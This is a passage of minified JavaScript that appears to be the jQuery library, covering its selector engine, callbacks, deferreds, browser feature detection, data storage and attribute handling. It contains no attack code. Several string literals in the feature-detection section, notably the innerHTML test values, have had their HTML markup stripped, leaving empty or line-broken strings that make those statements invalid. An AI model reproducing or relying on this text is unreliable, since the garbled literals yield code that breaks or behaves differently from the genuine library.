pt(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?pt(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},n):f},at.matches=function(e,t){return at(e,null,null,t)},at.matchesSelector=function(e,t){if((e.ownerDocument||e)!==f&&p(e),t=t.replace(Y,"='$1']"),!(!r.matchesSelector||!h||m&&m.test(t)||g&&g.test(t)))try{var n=y.call(e,t);if(n||r.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(i){}return at(t,f,null,[e]).length>0},at.contains=function(e,t){return(e.ownerDocument||e)!==f&&p(e),v(e,t)},at.attr=function(e,n){(e.ownerDocument||e)!==f&&p(e);var i=o.attrHandle[n.toLowerCase()],a=i&&L.call(o.attrHandle,n.toLowerCase())?i(e,n,!h):t;return a===t?r.attributes||!h?e.getAttribute(n):(a=e.getAttributeNode(n))&&a.specified?a.value:null:a},at.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},at.uniqueSort=function(e){var t,n=[],i=0,o=0;if(S=!r.detectDuplicates,c=!r.sortStable&&e.slice(0),e.sort(A),S){while(t=e[o++])t===e[o]&&(i=n.push(o));while(i--)e.splice(n[i],1)}return e},a=at.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=a(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r++)n+=a(t);return n},o=at.selectors={cacheLength:50,createPseudo:lt,match:Q,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(rt,it),e[3]=(e[4]||e[5]||"").replace(rt,it),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||at.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&at.error(e[0]),e},PSEUDO:function(e){var n,r=!e[5]&&e[2];return Q.CHILD.test(e[0])?null:(e[3]&&e[4]!==t?e[2]=e[4]:r&&J.test(r)&&(n=mt(r,!0))&&(n=r.indexOf(")",r.length-n)-r.length)&&(e[0]=e[0].slice(0,n),e[2]=r.slice(0,n)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(rt,it).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=N[e+" "];return t||(t=RegExp("(^|"+P+")"+e+"("+P+"|$)"))&&N(e,function(e){return t.test("string"==typeof e.className&&e.className||typeof e.getAttribute!==j&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=at.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" ").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,l){var u,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!l&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[b]||(m[b]={}),u=c[e]||[],d=u[0]===T&&u[1],f=u[0]===T&&u[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[T,d,f];break}}else if(v&&(u=(t[b]||(t[b]={}))[e])&&u[0]===T)f=u[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[b]||(p[b]={}))[e]=[T,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=o.pseudos[e]||o.setFilters[e.toLowerCase()]||at.error("unsupported pseudo: "+e);return r[b]?r(t):r.length>1?(n=[e,e,"",t],o.setFilters.hasOwnProperty(e.toLowerCase())?lt(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=F.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:lt(function(e){var t=[],n=[],r=l(e.replace(z,"$1"));return r[b]?lt(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:lt(function(e){return function(t){return at(e,t).length>0}}),contains:lt(function(e){return function(t){return(t.textContent||t.innerText||a(t)).indexOf(e)>-1}}),lang:lt(function(e){return G.test(e||"")||at.error("unsupported lang: "+e),e=e.replace(rt,it).toLowerCase(),function(t){var n;do if(n=h?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===d},focus:function(e){return e===f.activeElement&&(!f.hasFocus||f.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!o.pseudos.empty(e)},header:function(e){return tt.test(e.nodeName)},input:function(e){return et.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:ht(function(){return[0]}),last:ht(function(e,t){return[t-1]}),eq:ht(function(e,t,n){return[0>n?n+t:n]}),even:ht(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:ht(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:ht(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:ht(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}},o.pseudos.nth=o.pseudos.eq;for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})o.pseudos[n]=ft(n);for(n in{submit:!0,reset:!0})o.pseudos[n]=dt(n);function gt(){}gt.prototype=o.filters=o.pseudos,o.setFilters=new gt;function mt(e,t){var n,r,i,a,s,l,u,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,l=[],u=o.preFilter;while(s){(!n||(r=X.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),l.push(i=[])),n=!1,(r=U.exec(s))&&(n=r.shift(),i.push({value:n,type:r[0].replace(z," ")}),s=s.slice(n.length));for(a in o.filter)!(r=Q[a].exec(s))||u[a]&&!(r=u[a](r))||(n=r.shift(),i.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?at.error(e):k(e,l).slice(0)}function yt(e){var t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function vt(e,t,n){var r=t.dir,o=n&&"parentNode"===r,a=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||o)return e(t,n,i)}:function(t,n,s){var l,u,c,p=T+" "+a;if(s){while(t=t[r])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[r])if(1===t.nodeType||o)if(c=t[b]||(t[b]={}),(u=c[r])&&u[0]===p){if((l=u[1])===!0||l===i)return l===!0}else if(u=c[r]=[p],u[1]=e(t,n,s)||i,u[1]===!0)return!0}}function bt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function xt(e,t,n,r,i){var o,a=[],s=0,l=e.length,u=null!=t;for(;l>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),u&&t.push(s));return a}function wt(e,t,n,r,i,o){return r&&!r[b]&&(r=wt(r)),i&&!i[b]&&(i=wt(i,o)),lt(function(o,a,s,l){var u,c,p,f=[],d=[],h=a.length,g=o||Nt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:xt(g,f,e,s,l),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,l),r){u=xt(y,d),r(u,[],s,l),c=u.length;while(c--)(p=u[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){u=[],c=y.length;while(c--)(p=y[c])&&u.push(m[c]=p);i(null,y=[],u,l)}c=y.length;while(c--)(p=y[c])&&(u=i?F.call(o,p):f[c])>-1&&(o[u]=!(a[u]=p))}}else y=xt(y===a?y.splice(h,y.length):y),i?i(null,a,y,l):M.apply(a,y)})}function Tt(e){var t,n,r,i=e.length,a=o.relative[e[0].type],s=a||o.relative[" "],l=a?1:0,c=vt(function(e){return e===t},s,!0),p=vt(function(e){return F.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==u)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;i>l;l++)if(n=o.relative[e[l].type])f=[vt(bt(f),n)];else{if(n=o.filter[e[l].type].apply(null,e[l].matches),n[b]){for(r=++l;i>r;r++)if(o.relative[e[r].type])break;return wt(l>1&&bt(f),l>1&&yt(e.slice(0,l-1).concat({value:" "===e[l-2].type?"*":""})).replace(z,"$1"),n,r>l&&Tt(e.slice(l,r)),i>r&&Tt(e=e.slice(r)),i>r&&yt(e))}f.push(n)}return bt(f)}function Ct(e,t){var n=0,r=t.length>0,a=e.length>0,s=function(s,l,c,p,d){var h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,C=u,N=s||a&&o.find.TAG("*",d&&l.parentNode||l),k=T+=null==C?1:Math.random()||.1;for(w&&(u=l!==f&&l,i=n);null!=(h=N[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,l,c)){p.push(h);break}w&&(T=k,i=++n)}r&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,r&&b!==v){g=0;while(m=t[g++])m(x,y,l,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=q.call(p));y=xt(y)}M.apply(p,y),w&&!s&&y.length>0&&v+t.length>1&&at.uniqueSort(p)}return w&&(T=k,u=C),x};return r?lt(s):s}l=at.compile=function(e,t){var n,r=[],i=[],o=E[e+" "];if(!o){t||(t=mt(e)),n=t.length;while(n--)o=Tt(t[n]),o[b]?r.push(o):i.push(o);o=E(e,Ct(i,r))}return o};function Nt(e,t,n){var r=0,i=t.length;for(;i>r;r++)at(e,t[r],n);return n}function kt(e,t,n,i){var a,s,u,c,p,f=mt(e);if(!i&&1===f.length){if(s=f[0]=f[0].slice(0),s.length>2&&"ID"===(u=s[0]).type&&r.getById&&9===t.nodeType&&h&&o.relative[s[1].type]){if(t=(o.find.ID(u.matches[0].replace(rt,it),t)||[])[0],!t)return n;e=e.slice(s.shift().value.length)}a=Q.needsContext.test(e)?0:s.length;while(a--){if(u=s[a],o.relative[c=u.type])break;if((p=o.find[c])&&(i=p(u.matches[0].replace(rt,it),V.test(s[0].type)&&t.parentNode||t))){if(s.splice(a,1),e=i.length&&yt(s),!e)return M.apply(n,i),n;break}}}return l(e,f)(i,t,!h,n,V.test(e)),n}r.sortStable=b.split("").sort(A).join("")===b,r.detectDuplicates=S,p(),r.sortDetached=ut(function(e){return 1&e.compareDocumentPosition(f.createElement("div"))}),ut(function(e){return e.innerHTML=" ","#"===e.firstChild.getAttribute("href")})||ct("type|href|height|width",function(e,n,r){return r?t:e.getAttribute(n,"type"===n.toLowerCase()?1:2)}),r.attributes&&ut(function(e){return e.innerHTML="
",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||ct("value",function(e,n,r){return r||"input"!==e.nodeName.toLowerCase()?t:e.defaultValue}),ut(function(e){return null==e.getAttribute("disabled")})||ct(B,function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&i.specified?i.value:e[n]===!0?n.toLowerCase():null}),x.find=at,x.expr=at.selectors,x.expr[":"]=x.expr.pseudos,x.unique=at.uniqueSort,x.text=at.getText,x.isXMLDoc=at.isXML,x.contains=at.contains}(e);var O={};function F(e){var t=O[e]={};return x.each(e.match(T)||[],function(e,n){t[n]=!0}),t}x.Callbacks=function(e){e="string"==typeof e?O[e]||F(e):x.extend({},e);var n,r,i,o,a,s,l=[],u=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=l.length,n=!0;l&&o>a;a++)if(l[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,l&&(u?u.length&&c(u.shift()):r?l=[]:p.disable())},p={add:function(){if(l){var t=l.length;(function i(t){x.each(t,function(t,n){var r=x.type(n);"function"===r?e.unique&&p.has(n)||l.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=l.length:r&&(s=t,c(r))}return this},remove:function(){return l&&x.each(arguments,function(e,t){var r;while((r=x.inArray(t,l,r))>-1)l.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?x.inArray(e,l)>-1:!(!l||!l.length)},empty:function(){return l=[],o=0,this},disable:function(){return l=u=r=t,this},disabled:function(){return!l},lock:function(){return u=t,r||p.disable(),this},locked:function(){return!u},fireWith:function(e,t){return!l||i&&!u||(t=t||[],t=[e,t.slice?t.slice():t],n?u.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},x.extend({Deferred:function(e){var t=[["resolve","done",x.Callbacks("once memory"),"resolved"],["reject","fail",x.Callbacks("once memory"),"rejected"],["notify","progress",x.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return x.Deferred(function(n){x.each(t,function(t,o){var a=o[0],s=x.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&x.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?x.extend(e,r):r}},i={};return r.pipe=r.then,x.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=g.call(arguments),r=n.length,i=1!==r||e&&x.isFunction(e.promise)?r:0,o=1===i?e:x.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?g.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,l,u;if(r>1)for(s=Array(r),l=Array(r),u=Array(r);r>t;t++)n[t]&&x.isFunction(n[t].promise)?n[t].promise().done(a(t,u,n)).fail(o.reject).progress(a(t,l,s)):--i;return i||o.resolveWith(u,n),o.promise()}}),x.support=function(t){var n,r,o,s,l,u,c,p,f,d=a.createElement("div");if(d.setAttribute("className","t"),d.innerHTML="
a ",n=d.getElementsByTagName("*")||[],r=d.getElementsByTagName("a")[0],!r||!r.style||!n.length)return t;s=a.createElement("select"),u=s.appendChild(a.createElement("option")),o=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t.getSetAttribute="t"!==d.className,t.leadingWhitespace=3===d.firstChild.nodeType,t.tbody=!d.getElementsByTagName("tbody").length,t.htmlSerialize=!!d.getElementsByTagName("link").length,t.style=/top/.test(r.getAttribute("style")),t.hrefNormalized="/a"===r.getAttribute("href"),t.opacity=/^0.5/.test(r.style.opacity),t.cssFloat=!!r.style.cssFloat,t.checkOn=!!o.value,t.optSelected=u.selected,t.enctype=!!a.createElement("form").enctype,t.html5Clone="<:nav>"!==a.createElement("nav").cloneNode(!0).outerHTML,t.inlineBlockNeedsLayout=!1,t.shrinkWrapBlocks=!1,t.pixelPosition=!1,t.deleteExpando=!0,t.noCloneEvent=!0,t.reliableMarginRight=!0,t.boxSizingReliable=!0,o.checked=!0,t.noCloneChecked=o.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!u.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}o=a.createElement("input"),o.setAttribute("value",""),t.input=""===o.getAttribute("value"),o.value="t",o.setAttribute("type","radio"),t.radioValue="t"===o.value,o.setAttribute("checked","t"),o.setAttribute("name","t"),l=a.createDocumentFragment(),l.appendChild(o),t.appendChecked=o.checked,t.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip;for(f in x(t))break;return t.ownLast="0"!==f,x(function(){var n,r,o,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",l=a.getElementsByTagName("body")[0];l&&(n=a.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",l.appendChild(n).appendChild(d),d.innerHTML="
",o=d.getElementsByTagName("td"),o[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===o[0].offsetHeight,o[0].style.display="",o[1].style.display="none",t.reliableHiddenOffsets=p&&0===o[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",x.swap(l,null!=l.style.zoom?{zoom:1}:{},function(){t.boxSizing=4===d.offsetWidth}),e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(a.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="
",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(l.style.zoom=1)),l.removeChild(n),n=d=o=r=null)}),n=s=l=u=r=o=null,t }({});var B=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;function R(e,n,r,i){if(x.acceptData(e)){var o,a,s=x.expando,l=e.nodeType,u=l?x.cache:e,c=l?e[s]:e[s]&&s;if(c&&u[c]&&(i||u[c].data)||r!==t||"string"!=typeof n)return c||(c=l?e[s]=p.pop()||x.guid++:s),u[c]||(u[c]=l?{}:{toJSON:x.noop}),("object"==typeof n||"function"==typeof n)&&(i?u[c]=x.extend(u[c],n):u[c].data=x.extend(u[c].data,n)),a=u[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[x.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=a[x.camelCase(n)])):o=a,o}}function W(e,t,n){if(x.acceptData(e)){var r,i,o=e.nodeType,a=o?x.cache:e,s=o?e[x.expando]:x.expando;if(a[s]){if(t&&(r=n?a[s]:a[s].data)){x.isArray(t)?t=t.concat(x.map(t,x.camelCase)):t in r?t=[t]:(t=x.camelCase(t),t=t in r?[t]:t.split(" ")),i=t.length;while(i--)delete r[t[i]];if(n?!I(r):!x.isEmptyObject(r))return}(n||(delete a[s].data,I(a[s])))&&(o?x.cleanData([e],!0):x.support.deleteExpando||a!=a.window?delete a[s]:a[s]=null)}}}x.extend({cache:{},noData:{applet:!0,embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(e){return e=e.nodeType?x.cache[e[x.expando]]:e[x.expando],!!e&&!I(e)},data:function(e,t,n){return R(e,t,n)},removeData:function(e,t){return W(e,t)},_data:function(e,t,n){return R(e,t,n,!0)},_removeData:function(e,t){return W(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&x.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),x.fn.extend({data:function(e,n){var r,i,o=null,a=0,s=this[0];if(e===t){if(this.length&&(o=x.data(s),1===s.nodeType&&!x._data(s,"parsedAttrs"))){for(r=s.attributes;r.length>a;a++)i=r[a].name,0===i.indexOf("data-")&&(i=x.camelCase(i.slice(5)),$(s,i,o[i]));x._data(s,"parsedAttrs",!0)}return o}return"object"==typeof e?this.each(function(){x.data(this,e)}):arguments.length>1?this.each(function(){x.data(this,e,n)}):s?$(s,e,x.data(s,e)):null},removeData:function(e){return this.each(function(){x.removeData(this,e)})}});function $(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(P,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:B.test(r)?x.parseJSON(r):r}catch(o){}x.data(e,n,r)}else r=t}return r}function I(e){var t;for(t in e)if(("data"!==t||!x.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}x.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=x._data(e,n),r&&(!i||x.isArray(r)?i=x._data(e,n,x.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=x.queue(e,t),r=n.length,i=n.shift(),o=x._queueHooks(e,t),a=function(){x.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return x._data(e,n)||x._data(e,n,{empty:x.Callbacks("once memory").add(function(){x._removeData(e,t+"queue"),x._removeData(e,n)})})}}),x.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?x.queue(this[0],e):n===t?this:this.each(function(){var t=x.queue(this,e,n);x._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&x.dequeue(this,e)})},dequeue:function(e){return this.each(function(){x.dequeue(this,e)})},delay:function(e,t){return e=x.fx?x.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=x.Deferred(),a=this,s=this.length,l=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=x._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(l));return l(),o.promise(n)}});var z,X,U=/[\t\r\n\f]/g,V=/\r/g,Y=/^(?:input|select|textarea|button|object)$/i,J=/^(?:a|area)$/i,G=/^(?:checked|selected)$/i,Q=x.support.getSetAttribute,K=x.support.input;x.fn.extend({attr:function(e,t){return x.access(this,x.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){x.removeAttr(this,e)})},prop:function(e,t){return x.access(this,x.prop,e,t,arguments.length>1)},removeProp:function(e){return e=x.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,l="string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).addClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=x.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,l=0===arguments.length||"string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).removeClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?x.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e;return"boolean"==typeof t&&"string"===n?t?this.addClass(e):this.removeClass(e):x.isFunction(e)?this.each(function(n){x(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var t,r=0,o=x(this),a=e.match(T)||[];while(t=a[r++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else(n===i||"boolean"===n)&&(this.className&&x._data(this,"__className__",this.className),this.className=this.className||e===!1?"":x._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(U," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=x.isFunction(e),this.each(function(n){var o;1===this.nodeType&&(o=i?e.call(this,n,x(this).val()):e,null==o?o="":"number"==typeof o?o+="":x.isArray(o)&&(o=x.map(o,function(e){return null==e?"":e+""})),r=x.valHooks[this.type]||x.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=x.valHooks[o.type]||x.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(V,""):null==n?"":n)}}}),x.extend({valHooks:{option:{get:function(e){var t=x.find.attr(e,"value");return null!=t?t:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,l=0>i?s:o?i:0;for(;s>l;l++)if(n=r[l],!(!n.selected&&l!==i||(x.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&x.nodeName(n.parentNode,"optgroup"))){if(t=x(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n,r,i=e.options,o=x.makeArray(t),a=i.length;while(a--)r=i[a],(r.selected=x.inArray(x(r).val(),o)>=0)&&(n=!0);return n||(e.selectedIndex=-1),o}}},attr:function(e,n,r){var o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return typeof e.getAttribute===i?x.prop(e,n,r):(1===s&&x.isXMLDoc(e)||(n=n.toLowerCase(),o=x.attrHooks[n]||(x.expr.match.bool.test(n)?X:z)),r===t?o&&"get"in o&&null!==(a=o.get(e,n))?a:(a=x.find.attr(e,n),null==a?t:a):null!==r?o&&"set"in o&&(a=o.set(e,r,n))!==t?a:(e.setAttribute(n,r+""),r):(x.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(T);if(o&&1===e.nodeType)while(n=o[i++])r=x.propFix[n]||n,x.expr.match.bool.test(n)?K&&Q||!G.test(n)?e[r]=!1:e[x.camelCase("default-"+n)]=e[r]=!1:x.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!x.support.radioValue&&"radio"===t&&x.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{"for":"htmlFor","class":"className"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!x.isXMLDoc(e),a&&(n=x.propFix[n]||n,o=x.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var t=x.find.attr(e,"tabindex");return t?parseInt(t,10):Y.test(e.nodeName)||J.test(e.nodeName)&&e.href?0:-1}}}}),X={set:function(e,t,n){return t===!1?x.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&x.propFix[n]||n,n):e[x.camelCase("default-"+n)]=e[n]=!0,n}},x.each(x.expr.match.bool.source.match(/\w+/g),function(e,n){var r=x.expr.attrHandle[n]||x.find.attr;x.expr.attrHandle[n]=K&&Q||!G.test(n)?function(e,n,i){var o=x.expr.attrHandle[n],a=i?t:(x.expr.attrHandle[n]=t)!=r(e,n,i)?n.toLowerCase():null;return x.expr.attrHandle[n]=o,a}:function(e,n,r){return r?t:e[x.camelCase("default-"+n)]?n.toLowerCase():null}}),K&&Q||(x.attrHooks.value={set:function(e,n,r){return x.nodeName(e,"input")?(e.defaultValue=n,t):z&&z.set(e,n,r)}}),Q||(z={set:function(e,n,r){var i=e.getAttributeNode(r);return 